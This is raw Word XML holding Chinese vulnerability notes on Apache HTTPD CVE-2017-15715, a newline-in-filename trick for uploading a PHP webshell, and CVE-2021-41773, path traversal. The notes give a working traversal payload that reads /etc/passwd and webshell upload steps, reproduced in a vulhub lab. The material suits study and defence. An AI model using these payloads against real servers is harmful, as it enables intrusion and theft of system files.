                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:srcRect t="750" b="4610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B4B5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 Apache HTTPD换行解析漏洞(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cve-2017-15715</w:t>
      </w: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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21297293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漏洞说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D3DAE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CVE-2017-15715 的出现是由于A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在修复第一个后缀名解析漏洞时，使用正则表达式匹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4129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配后缀，在解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xxx.php\x0A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后缀进行解析，导致绕过一些服务器的安全策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA885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影响版本:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache HTTPd 2.4.0~2.4.29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD6F1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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C6887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Apache HTTP服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对正则表达式特殊字符“$”的处理。在正则表达式中，“$”通常用来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6392D75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指示字符串的结尾。如果配置文件中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对象Multiline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>属性被启用，那么“$”字符不仅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BE55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会匹配字符串的结束，还会匹配换行符（如“\n”或“\r”）。这意味着，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为了匹配字面意义上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A386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的“$”字符，需要使用反斜杠进行转义，即“\$”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2ED0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Style w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>漏洞利用：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在上传文件时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以在文件名后添加一个十六进制编码的换行符（如“\x0A”），生</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB4FE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/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>成一个类似“1.php\x0A”的文件名。由于Apache服务器在解析时会将这个换行符当作文件名的一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95132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B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>部分，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击者就能绕过那些基于文件后缀名检测的安全措施，即使后缀名在黑名单中，文件也能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0CAEE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color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>被正常解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E0DB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理论上只要使用正则来匹配文件后缀名，就有可能存在该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580D17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受影响的Apache版本中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞在默认配置下就能被利用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>故</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>系统管理员要确保及时更新到最新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F08D9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sz w:val="24"/>
        </w:rPr>
        <w:t>版本，或在服务器配置中禁用RegExp对象的Multiline属性，以防此类攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75692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漏洞复现：打开vulhub容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F508C1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访问网站：192.168.1.9:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BE0D2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上传1.php一句话木马文件并抓包——在16进制位置添加换行符编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C994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再次发送：没有提示bad files了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0189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访问上传的这个文件——即可利用文件（建议上传phpinfo()文件，访问时效果明显）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C807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此处可以用专门的Webshell工具利用木马。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44796219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 Apache HTTP Server 2.4.49路径穿越漏洞(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CVE-2021-41773</w:t>
      </w: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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB51F23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漏洞说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62787B8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利用这个漏洞可以读取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录以外的其他文件，或读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中的脚本源码，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328913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如果服务器开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务，还可进行任意代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656A46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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache HTTP Server 2.4.49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE8FB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因修复不完整，在版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache HTTP Server 2.4.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>仍有影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D0A99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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C4742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在对发送的请求中的路径参数进行规范化时，其使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ap_normalize_path()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>函数会对路径参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292660E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数先进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解码，然后判断是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径穿越符。检测到路径中存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> % </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符时，若其紧跟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F708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的两个字符是十六进制字符，则程序会对其进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解码，将其转换成标准字符，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>会被转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286CE54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为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>点。若转换后的标准字符为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>点，此时程序会立即判断其后两字符是否为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，从而判断是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3ABE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否存在未经允许的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径穿越行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606AD16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若路径中存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%2e./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>形式，程序就会检测到路径穿越符。但当出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.%2e/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%2e%2e/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的形式，程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AFBB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序就不会将其检测为路径穿越符。原因是因为遍历到第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符时，程序检测到其后两字符为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5106487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而非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，就不判断其为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>符。因此攻击者可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.%2e/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> %2e%2e/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>绕过程序对路径穿越符的检测，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791783B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从而读取位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录以外的其他文件，或读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录中的脚本文件源码，或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624753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在开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cgi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cgid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的服务器上执行任意命令。本质上，这一漏洞属于代码层面的逻辑漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2B83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>漏洞复现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动容器后访问——抓包改包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565311D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改包payload如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1485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路径穿越成功，拿到敏感文件信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1118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005F3E7F" wp14:editId="60ED4522">
            <wp:extent cx="5976620" cy="1698625"/>
